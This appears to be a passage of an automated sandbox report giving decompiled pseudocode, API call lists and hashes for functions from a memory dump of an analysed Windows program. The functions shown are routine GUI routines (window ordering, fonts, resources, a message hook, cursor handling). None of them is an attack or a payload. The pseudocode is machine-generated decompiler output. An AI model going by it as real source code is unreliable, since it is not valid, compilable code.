API ID: CriticalSection$EnterLeave String ID: XHB$hcF API String ID: 3168844106-4103439798 Opcode ID: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011 Instruction ID: b30c6dabbdf70119b55d85a08352cb78ceca07d7645c1d65d08a879069df6dfc Opcode Fuzzy Hash: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011 Instruction Fuzzy Hash: 75219C74B04308AFC701DF69D88198DBBF5FB89320F6181AAF840A7351D778AE80CB58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00455BB4(void* __eax, void* __ecx, char __edx) { char _v12; struct HWND__* _v20; int _t17; void* _t27; struct HWND__* _t33; void* _t35; void* _t36; long _t37; _t37 = _t36 + 0xfffffff8; _t27 = __eax; _t17 = *0x466580; // 0x26df470 if( *((intOrPtr*)(_t17 + 0x30)) != 0) { if( *((intOrPtr*)(__eax + 0x94)) == 0) { *_t37 = *((intOrPtr*)(__eax + 0x30)); _v12 = __edx; EnumWindows(E00455B44, _t37); _t5 = _t27 + 0x90; // 0x0 _t17 = *_t5; if( *((intOrPtr*)(_t17 + 8)) != 0) { _t33 = GetWindow(_v20, 3); _v20 = _t33; if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) { _v20 = 0xfffffffe; } _t10 = _t27 + 0x90; // 0x0 _t17 = *_t10; _t35 = *((intOrPtr*)(_t17 + 8)) - 1; if(_t35 >= 0) { do { _t13 = _t27 + 0x90; // 0x0 _t17 = SetWindowPos(E0041A80C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213); _t35 = _t35 - 1; } while (_t35 != 0xffffffff); } } } *((intOrPtr*)(_t27 + 0x94)) = *((intOrPtr*)(_t27 + 0x94)) + 1; } return _t17; } 0x00455bb6 0x00455bb9 0x00455bbb 0x00455bc4 0x00455bd1 0x00455bda 0x00455bdd 0x00455be9 0x00455bee 0x00455bee 0x00455bf8 0x00455c06 0x00455c08 0x00455c15 0x00455c17 0x00455c17 0x00455c1e 0x00455c1e 0x00455c27 0x00455c2b 0x00455c2d 0x00455c41 0x00455c4d 0x00455c52 0x00455c53 0x00455c2d 0x00455c2b 0x00455bf8 0x00455c58 0x00455c58 0x00455c62

APIs

EnumWindows.USER32(00455B44), ref: 00455BE9 GetWindow.USER32(00000003,00000003), ref: 00455C01 GetWindowLongA.USER32 ref: 00455C0E SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455C4D

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows String ID: API String ID: 4191631535-0 Opcode ID: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a Instruction ID: b5efe040d9ee5e4ec0beb5a4be758dd33e8dc33b5e347aa2bed5e18668bfd801 Opcode Fuzzy Hash: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a Instruction Fuzzy Hash: F2119E306047509FDB21EB28CC85FA673D4AB05325F1402BAFE58AB2D3C3789C84C76A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043A4D8(void* __eax, int __ecx, int __edx) { void* _t6; intOrPtr _t16; int _t27; int _t28; int _t29; int _t30; int _t31; int _t32; _t6 = __eax; _t27 = __ecx; _t28 = __edx; _t16 = *((intOrPtr*)(__eax + 0x74)); _t29 = *(_t16 + 0x14); if(_t29 > 0) { _t6 = E00439390(_t16, MulDiv(_t29, __edx, __ecx), 3); } _t30 = *(_t16 + 0xc); if(_t30 > 0) { _t6 = E00439390(_t16, MulDiv(_t30, _t28, _t27), 1); } _t31 = *(_t16 + 0x10); if(_t31 > 0) { _t6 = E00439390(_t16, MulDiv(_t31, _t28, _t27), 2); } _t32 = *(_t16 + 8); if(_t32 > 0) { return E00439390(_t16, MulDiv(_t32, _t28, _t27), 0); } return _t6; } 0x0043a4d8 0x0043a4dc 0x0043a4de 0x0043a4e0 0x0043a4e3 0x0043a4e8 0x0043a4fb 0x0043a4fb 0x0043a500 0x0043a505 0x0043a518 0x0043a518 0x0043a51d 0x0043a522 0x0043a535 0x0043a535 0x0043a53a 0x0043a53f 0x00000000 0x0043a54f 0x0043a558

APIs

MulDiv.KERNEL32(?), ref: 0043A4ED MulDiv.KERNEL32(?), ref: 0043A50A MulDiv.KERNEL32(?), ref: 0043A527 MulDiv.KERNEL32(?), ref: 0043A544

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041 Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%

E0041D024(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) { CHAR* _v8; void* __ebx; void* __ecx; void* __edi; void* __esi; void* __ebp; void* _t18; void* _t23; CHAR* _t24; void* _t25; struct HRSRC__* _t29; void* _t30; struct HINSTANCE__* _t31; void* _t32; _v8 = _t24; _t31 = __edx; _t23 = __eax; _t29 = FindResourceA(__edx, _v8, _a8); *(_t23 + 0x10) = _t29; if(_t29 == 0) { E0041CF84(_t23, _t24, _t29, _t31, _t32); _pop(_t24); } _t5 = _t23 + 0x10; // 0x41d0c0 _t30 = LoadResource(_t31, *_t5); *(_t23 + 0x14) = _t30; if(_t30 == 0) { E0041CF84(_t23, _t24, _t30, _t31, _t32); } _t7 = _t23 + 0x10; // 0x41d0c0 _push(SizeofResource(_t31, *_t7)); _t8 = _t23 + 0x14; // 0x41cd68 _t18 = LockResource( *_t8); _pop(_t25); return E0041CD28(_t23, _t25, _t18); } 0x0041d02b 0x0041d02e 0x0041d030 0x0041d040 0x0041d042 0x0041d047 0x0041d04a 0x0041d04f 0x0041d04f 0x0041d050 0x0041d05a 0x0041d05c 0x0041d061 0x0041d064 0x0041d069 0x0041d06a 0x0041d074 0x0041d075 0x0041d079 0x0041d082 0x0041d08d

APIs

FindResourceA.KERNEL32(?,?,?), ref: 0041D03B LoadResource.KERNEL32(?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D055 SizeofResource.KERNEL32(?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D06F LockResource.KERNEL32(0041CD68,00000000,?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000), ref: 0041D079

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof String ID: API String ID: 3473537107-0 Opcode ID: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59 Instruction ID: 11fe1cfdb4414f926eae3f9df9586ded9b707078bdbb83b49df9978c7684b3c8 Opcode Fuzzy Hash: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59 Instruction Fuzzy Hash: D0F0ADB36042146F8744EF6EAC81D9B7BECEE88364310012FF908D7242DA38ED118778

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E004383DC(struct HWND__* __eax, void* __ecx) { intOrPtr _t9; signed int _t16; struct HWND__* _t19; DWORD* _t20; _t17 = __ecx; _push(__ecx); _t19 = __eax; _t16 = 0; if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() == *_t20) { _t9 = *0x466504; // 0x270a898 if(GlobalFindAtomA(E00404C00(_t9)) != *0x466500) { _t16 = 0 | E00437448(_t19, _t17) != 0x00000000; } else { _t16 = 0 | GetPropA(_t19, *0x466500 & 0x0000ffff) != 0x00000000; } } return _t16; } 0x004383dc 0x004383de 0x004383df 0x004383e1 0x004383e5 0x004383fc 0x00438413 0x00438433 0x00438415 0x00438425 0x00438425 0x00438413 0x0043843b

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004383E9 GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2 GlobalFindAtomA.KERNEL32(00000000), ref: 00438407 GetPropA.USER32 ref: 0043841E

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow String ID: API String ID: 2582817389-0 Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4 Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E0043747C(struct HWND__* __eax, void* __ecx) { intOrPtr _t5; struct HWND__* _t12; void* _t15; DWORD* _t16; _t13 = __ecx; _push(__ecx); _t12 = __eax; _t15 = 0; if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() == *_t16) { _t5 = *0x466508; // 0x2711cc0 if(GlobalFindAtomA(E00404C00(_t5)) != *0x466502) { _t15 = E00437448(_t12, _t13); } else { _t15 = GetPropA(_t12, *0x466502 & 0x0000ffff); } } return _t15; } 0x0043747c 0x0043747e 0x0043747f 0x00437481 0x00437485 0x0043749c 0x004374b3 0x004374ce 0x004374b5 0x004374c3 0x004374c3 0x004374b3 0x004374d5

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00437489 GetCurrentProcessId.KERNEL32(?,00460C02,00000000,004586E9,?,?,00460C02,00000001,00456D34,?,00000000,00000000,00000000,00000001), ref: 00437492 GlobalFindAtomA.KERNEL32(00000000), ref: 004374A7 GetPropA.USER32 ref: 004374BE

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow String ID: API String ID: 2582817389-0 Opcode ID: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6 Instruction ID: a2f4f6fb400889014e80e2d2de551d02392c32fcff4c83d9196b20b4c67440de Opcode Fuzzy Hash: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6 Instruction Fuzzy Hash: F2F0A7E120811476D53077B66C8282B198C8928368F02657BFA82E3297D56CEC4142BE

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0045539C(void* __ecx) { void* _t2; DWORD* _t7; _t2 = *0x466580; // 0x26df470 if( *((char*)(_t2 + 0xad)) == 0) { if( *0x466598 == 0) { _t2 = SetWindowsHookExA(3, E00455358, 0, GetCurrentThreadId()); *0x466598 = _t2; } if( *0x466594 == 0) { _t2 = CreateEventA(0, 0, 0, 0); *0x466594 = _t2; } if( *0x46659c == 0) { _t2 = CreateThread(0, 0x3e8, E004552FC, 0, 0, _t7); *0x46659c = _t2; } } return _t2; } 0x0045539d 0x004553a9 0x004553b2 0x004553c4 0x004553c9 0x004553c9 0x004553d5 0x004553df 0x004553e4 0x004553e4 0x004553f0 0x00455403 0x00455408 0x00455408 0x004553f0 0x0045540e

APIs

GetCurrentThreadId.KERNEL32 ref: 004553B4 SetWindowsHookExA.USER32 ref: 004553C4 CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045834E), ref: 004553DF CreateThread.KERNEL32 ref: 00455403

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows String ID: API String ID: 1195359707-0 Opcode ID: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb Instruction ID: a9d03a39fb95b2e519a0ab36c9fe0646124770ff35457d36c1f1fd7bedb10476 Opcode Fuzzy Hash: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb Instruction Fuzzy Hash: A6F01D70784780BEF610AB21BC17B2636949715B16F21517AF50A791D7E2F824888A5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0042ACC4() { signed char _v28; void* _t4; signed int _t8; struct HDC__* _t9; struct tagTEXTMETRICA* _t10; _t8 = 1; _t9 = GetDC(0); if(_t9 != 0) { _t4 = *0x466360; // 0x58a00b4 if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) { _t8 = _v28 & 0x000000ff; } ReleaseDC(0, _t9); } return _t8; } 0x0042acc9 0x0042acd2 0x0042acd6 0x0042acd8 0x0042ace6 0x0042acf3 0x0042acf3 0x0042acfb 0x0042acfb 0x0042ad07

APIs

GetDC.USER32(00000000), ref: 0042ACCD SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF GetTextMetricsA.GDI32(00000000), ref: 0042ACEA ReleaseDC.USER32 ref: 0042ACFB

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText String ID: API String ID: 2013942131-0 Opcode ID: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9 Instruction ID: de7c194213a4f2e578b42373dec20c7b80f31d2e9068f76ebd383a2718700f4b Opcode Fuzzy Hash: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9 Instruction Fuzzy Hash: 23E0DF1174A23123D21032663C82BAB218C4F023A5F89013BFD24E93C1DA0DCD2083FF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 71%

E00438C24(signed int __eax, void* __edi, void* __esi) { signed int _v5; signed int _v12; signed int _v13; intOrPtr _v17; intOrPtr _v21; void* __ebx; void* __ebp; signed int _t46; signed int _t47; signed int _t48; signed int _t49; signed int _t52; signed int _t53; void* _t54; signed int _t55; struct HICON__* _t56; intOrPtr _t61; signed int _t65; signed int _t69; signed int _t71; void* _t72; signed int _t76; signed int _t77; void* _t80; signed int _t81; intOrPtr _t82; signed int _t87; signed int _t90; signed int _t91; intOrPtr* _t97; void* _t100; signed int _t104; intOrPtr _t113; intOrPtr _t116; signed int _t118; signed int _t120; signed int _t122; signed int _t124; intOrPtr _t127; signed int _t128; signed int _t129; intOrPtr _t136; intOrPtr _t138; void* _t140; void* _t141; void* _t143; void* _t145; intOrPtr _t146; _t141 = __esi; _t140 = __edi; _t46 = __eax; _t143 = _t145; _t146 = _t145 + 0xffffffec; _v5 = __eax; _t97 = 0; _v13 = 0; if( *0x466514 == 0) { L36: return _t46; } else { _t46 = *0x466514; // 0x0 if( *((char*)(_t46 + 5)) != 0) { goto L36; } else { _push(_t143); _push(0x438f39); _push( *[fs:edx]); *[fs:edx] = _t146; _t47 = *0x466514; // 0x0 *0x466540 = _t47; _push(_t143); _push(0x438ec7); _push( *[fs:edx]); *[fs:edx] = _t146; _t48 = *0x466514; // 0x0 *((char*)(_t48 + 5)) = 1; _t49 = *0x466514; // 0x0 *((char*)(_t49 + 0x20)) = _v5 & 0x000000ff; _t113 = *0x46651c; // 0x0 E00437AA4(_t113); if( *0x466530 == 2) { _t91 = *0x466514; // 0x0 _t138 = *0x43519c; // 0x4351e8 _t97 = E00403AD8(_t91, _t138); *((char*)(_t97 + 0x74)) = *((intOrPtr*)( *_t97 + 0x34))() & 0xffffff00 | *((intOrPtr*)(_t97 + 8)) == 0x00000000; } _t52 = *0x466514; // 0x0 if( *((intOrPtr*)(_t52 + 8)) == 0) { L7: _t53 = *0x466514; // 0x0 _v21 = *((intOrPtr*)(_t53 + 0x10)); _t115 = *((intOrPtr*)(_t53 + 0x14)); _v17 = *((intOrPtr*)(_t53 + 0x14)); } else { _t87 = *0x466514; // 0x0 _t136 = *0x4362e8; // 0x436334 if(E00403AB4( *((intOrPtr*)(_t87 + 8)), _t136) == 0) { goto L7; } else { _t90 = *0x466514; // 0x0 _v21 = *((intOrPtr*)(_t90 + 0x18)); _t115 = *((intOrPtr*)(_t90 + 0x1c)); _v17 = *((intOrPtr*)(_t90 + 0x1c)); } } _t54 = E00438BB0(_t143); _pop(_t100); if(_t54 == 0) { L14: _t55 = 0; } else { if( *0x466530 != 2 || *((char*)(_t97 + 0x74)) == 0) { if( *0x466530 == 0) { goto L14; } else { E004384B8(1); if(1 == 0) { goto L14; } else { goto L13; } } } else { L13: if(_v5 != 0) { _t55 = 1; } else { goto L14; } } } _v13 = _t55; if( *0x466530 != 2) { __eflags = *0x466534; if(__eflags == 0) { _t56 = *0x466528; // 0x0 SetCursor(_t56); } else { _t77 = *0x466534; // 0x0 E004440E4(_t77, _t115, __eflags); } } else { if(_v13 != 0 && *((char*)(_t97 + 0x74)) != 0) { _t80 = E0044CE28( *((intOrPtr*)(_t97 + 0x40))); if(_t80 != 0 && *((intOrPtr*)(_t80 + 0x268)) == *((intOrPtr*)(_t97 + 0x40))) { E00451654(_t80, _t97, _t100, 0, _t140, _t141); } _t81 = *0x466514; // 0x0 _t82 = *0x466510; // 0x0 E0043BC9C(_t82, 0, 0xb03a, _t81); } } *0x466510 = 0; *0x466514 = 0; if( *0x466540 == 0) { L33: _pop(_t116); *[fs:eax] = _t116; _push(0x438ece); _t61 = *0x46653c; // 0x0 E00403928(_t61); *0x46653c = 0; __eflags = *0x466540; if( *0x466540 != 0) { _t65 = *0x466540; // 0x0 *((char*)(_t65 + 5)) = 0; _t69 = *0x466540; // 0x0 *((intOrPtr*)( *_t69))(_v13 & 0x000000ff, _v17); } __eflags = 0; *0x466514 = 0; return 0; } else { _t71 = *0x466540; // 0x0 if( *((intOrPtr*)(_t71 + 8)) == 0) { goto L33; } else { _t72 = 3; if(_v13 == 0) { _t72 = 4; _t128 = *0x466540; // 0x0 *((intOrPtr*)(_t128 + 0x10)) = 0; _t129 = *0x466540; // 0x0 *((intOrPtr*)(_t129 + 0x14)) = 0; _v21 = 0; _v17 = 0; } _t118 = *0x466540; // 0x0 _v12 = _t118; _push(_t143); _push(0x438e6b); _push( *[fs:edx]); *[fs:edx] = _t146; _t120 = *0x466540; // 0x0 _t122 = *0x466540; // 0x0 _t124 = *0x466540; // 0x0 _t104 = *0x466540; // 0x0 E00438384( *((intOrPtr*)(_t124 + 0xc)), _t104, _t72, _t122 + 0x10, *((intOrPtr*)(_t120 + 8))); _pop(_t127); *[fs:eax] = _t127; _push(0x438e72); if( *0x466540 == 0) { _t76 = _v12; *0x466540 = _t76; return _t76; } return 0; } } } } } 0x00438c24 0x00438c24 0x00438c24 0x00438c25 0x00438c27 0x00438c2b 0x00438c2e 0x00438c30 0x00438c3b 0x00438f40 0x00438f44 0x00438c41 0x00438c41 0x00438c4a 0x00000000 0x00438c50 0x00438c52 0x00438c53 0x00438c58 0x00438c5b 0x00438c5e 0x00438c63 0x00438c6a 0x00438c6b 0x00438c70 0x00438c73 0x00438c76 0x00438c7b 0x00438c7f 0x00438c88 0x00438c8b 0x00438c96 0x00438ca2 0x00438ca4 0x00438ca9 0x00438cb4 0x00438cc4 0x00438cc4 0x00438cc7 0x00438cd0 0x00438cfc 0x00438cfc 0x00438d04 0x00438d07 0x00438d0a 0x00438cd2 0x00438cd2 0x00438cda 0x00438ce7 0x00000000 0x00438ce9 0x00438ce9 0x00438cf1 0x00438cf4 0x00438cf7 0x00438cf7 0x00438ce7 0x00438d0e 0x00438d13 0x00438d16 0x00438d41 0x00438d41 0x00438d18 0x00438d1f 0x00438d2e 0x00000000 0x00438d30 0x00438d32 0x00438d39 0x00000000 0x00000000 0x00000000 0x00000000 0x00438d39 0x00438d3b 0x00438d3b 0x00438d3f 0x00438d45 0x00000000 0x00000000 0x00000000 0x00438d3f 0x00438d1f 0x00438d47 0x00438d51 0x00438d98 0x00438d9f 0x00438dad 0x00438db3 0x00438da1 0x00438da1 0x00438da6 0x00438da6 0x00438d53 0x00438d57 0x00438d64 0x00438d6b 0x00438d7a 0x00438d7a 0x00438d7f 0x00438d8c 0x00438d91 0x00438d91 0x00438d57 0x00438dba 0x00438dc1 0x00438dcd 0x00438e72 0x00438e74 0x00438e77 0x00438e7a 0x00438e7f 0x00438e84 0x00438e8b 0x00438e90 0x00438e97 0x00438e99 0x00438e9e 0x00438eb6 0x00438ebd 0x00438ebd 0x00438ebf 0x00438ec1 0x00438ec6 0x00438dd3 0x00438dd3 0x00438ddc 0x00000000 0x00438de2 0x00438de2 0x00438de8 0x00438dea 0x00438dec 0x00438df4 0x00438df7 0x00438dff 0x00438e04 0x00438e09 0x00438e09 0x00438e0c 0x00438e12 0x00438e17 0x00438e18 0x00438e1d 0x00438e20 0x00438e23 0x00438e2d 0x00438e37 0x00438e40 0x00438e47 0x00438e4e 0x00438e51 0x00438e54 0x00438e60 0x00438e62 0x00438e65 0x00000000 0x00438e65 0x00438e6a 0x00438e6a 0x00438ddc 0x00438dcd 0x00438c4a

APIs

Part of subcall function 00437AA4: ReleaseCapture.USER32(00000000,00438C9B,00000000,00438EC7,?,00000000,00438F39), ref: 00437AA7 SetCursor.USER32(00000000,00000000,00438EC7,?,00000000,00438F39), ref: 00438DB3 Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100

Strings

QC , xrefs: 00438CA9 4cC , xrefs: 00438CDA

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureCursorDragImageList_Release String ID: 4cC$QC API String ID: 1302740870-1275598162 Opcode ID: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a Instruction ID: dc2065d6e0f599aa4aa913a50c49f208dad52c561c5e25ae754aa2762872304a Opcode Fuzzy Hash: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a Instruction Fuzzy Hash: 69819670604340AFD715CF18E846B56FBE1BB58308F1591BBE805873AAEB789941CB9A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0042590C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { signed int _v8; struct tagLOGFONTA _v68; int _v72; char _v76; char _v80; char _v84; intOrPtr _t87; intOrPtr _t91; intOrPtr _t97; signed int _t106; char* _t110; int _t115; intOrPtr* _t121; void* _t124; void* _t138; intOrPtr _t149; int _t161; int* _t162; int _t164; void* _t167; void* _t168; intOrPtr _t169; int* _t181; _t167 = _t168; _t169 = _t168 + 0xffffffb0; _v84 = 0; _v80 = 0; _v76 = 0; _v72 = 0; _t138 = __eax; _push(_t167); _push(0x425b28); _push( *[fs:eax]); *[fs:eax] = _t169; _v8 = *((intOrPtr*)(__eax + 0x10)); if( *((intOrPtr*)(_v8 + 8)) != 0) { __eflags = 0; *[fs:eax] = 0; _push(E00425B2F); return E00404760( &_v84, 4); } else { _t87 = *0x466398; // 0x2711bc8 E00424BEC(_t87); _push(_t167); _push(0x425b00); _push( *[fs:edx]); *[fs:edx] = _t169; if( *((intOrPtr*)(_v8 + 8)) == 0) { _t12 = _v8 + 0x14; // 0xe8c38bd6 _v68.lfHeight = *_t12; _v68.lfWidth = 0; _t16 = _v8 + 0x18; // 0xffffff88 _t97 = *_t16; _v68.lfEscapement = _t97; _v68.lfOrientation = _t97; if(( *(_v8 + 0x1d) & 0x00000001) == 0) { _v68.lfWeight = 0x190; } else { _v68.lfWeight = 0x2bc; } _v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000002) != 0x00000000; _v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000004) != 0x00000000; _v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000008) != 0x00000000; _t47 = _v8 + 0x1e; // 0x5a590424 _t106 = *_t47 & 0x000000ff; if(_t106 != 1) { L8: _v68.lfCharSet = _t106; } else { _t177 = *0x461c3a - 1; if( *0x461c3a == 1) { goto L8; } else { _v68.lfCharSet = *0x461c3a & 0x000000ff; } } E004049A0( &_v72, _v8 + 0x1f, _t177); _t164 = _v72; if(_t164 != 0) { _t164 = *(_t164 - 4); } _t161 = "Default"; if(_t161 != 0) { _t162 = _t161 - 4; _t181 = _t162; _t161 = *_t162; } _t110 = E00404C00("Default"); E004049A0( &_v76, _v8 + 0x1f, _t181); _t115 = CompareStringA(0x400, 1, E00404C00(_v76), _t164, _t110, _t161); _t182 = _t115 != 2; if(_t115 != 2) { __eflags = _v8 + 0x1f; E004049A0( &_v84, _v8 + 0x1f, _v8 + 0x1f); E004090B0( &(_v68.lfFaceName), _v84); } else { E004049A0( &_v80, 0x461c3b, _t182); E004090B0( &(_v68.lfFaceName), _v80); } _t121 = *0x462f2c; // 0x4617c0 if( *_t121 == 1 && E0042ACC4() == 0x80 && E004258E0(_v8 + 0x10) != 0) { _v68.lfCharSet = 0x80; } _v68.lfQuality = 0; if(_v68.lfOrientation == 0) { _v68.lfOutPrecision = 0; } else { _v68.lfOutPrecision = 7; } _v68.lfClipPrecision = 0; _t124 = E00425C84(_t138) - 1; if(_t124 == 0) { _v68.lfPitchAndFamily = 2; } else { if(_t124 == 1) { _v68.lfPitchAndFamily = 1; } else { _v68.lfPitchAndFamily = 0; } } *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68); } _pop(_t149); *[fs:eax] = _t149; _push(E00425B07); _t91 = *0x466398; // 0x2711bc8 return E00424BF8(_t91); } } 0x0042590d 0x0042590f 0x00425917 0x0042591a 0x0042591d 0x00425920 0x00425923 0x00425927 0x00425928 0x0042592d 0x00425930 0x00425936 0x00425940 0x00425b0d 0x00425b12 0x00425b15 0x00425b27 0x00425946 0x00425946 0x0042594b 0x00425952 0x00425953 0x00425958 0x0042595b 0x00425965 0x0042596e 0x00425971 0x00425976 0x0042597c 0x0042597c 0x0042597f 0x00425982 0x0042598c 0x00425997 0x0042598e 0x0042598e 0x0042598e 0x004259a8 0x004259b5 0x004259c2 0x004259c8 0x004259c8 0x004259ce 0x004259e5 0x004259e5 0x004259d0 0x004259d0 0x004259d7 0x00000000 0x004259d9 0x004259e0 0x004259e0 0x004259d7 0x004259f1 0x004259f6 0x004259fb 0x00425a00 0x00425a00 0x00425a02 0x00425a09 0x00425a0b 0x00425a0b 0x00425a0e 0x00425a0e 0x00425a16 0x00425a26 0x00425a3b 0x00425a43 0x00425a45 0x00425a67 0x00425a6a 0x00425a75 0x00425a47 0x00425a4f 0x00425a5a 0x00425a5a 0x00425a7a 0x00425a82 0x00425a9c 0x00425a9c 0x00425aa0 0x00425aa8 0x00425ab0 